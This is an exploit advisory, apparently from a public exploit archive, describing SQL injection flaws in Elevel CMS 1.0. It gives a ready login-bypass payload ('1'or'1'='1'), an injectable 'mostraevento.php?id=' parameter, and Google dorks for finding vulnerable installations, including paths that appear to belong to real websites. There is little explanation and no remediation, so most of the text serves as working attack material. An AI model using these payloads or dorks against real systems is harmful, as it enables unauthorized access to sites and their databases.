Elevel CMS version 1.0 suffers from multiple remote SQL injection vulnerabilities including one in the login flow that allows for authentication bypass.
5c2a9d05c62a2c6c9c285f97e030f823c66fe5b7c1b93088a1e5ed551de8d14d
====================================================================================================================================
| # Title : Elevel CMS v1.0 authentication bypass vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |
| # Vendor : http://www.elevel.it/ |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] uSE pAYLOAD : user & pass : 1'or'1'='1
[+] http://127.0.0.1/gruppimolleportoniit/login.php
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================
====================================================================================================================================
| # Title : Elevel CMS v1.0 "mostraevento.php" Sql Injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |
| # Vendor : http://www.elevel.it/ |
| # Dork : inurl:mostraevento.php?id= |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use Payload : /mostraevento.php?id=39 (inject her)
[+] http://www/puntamarinatermeit/mostraevento.php?id=47 (inject her)
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================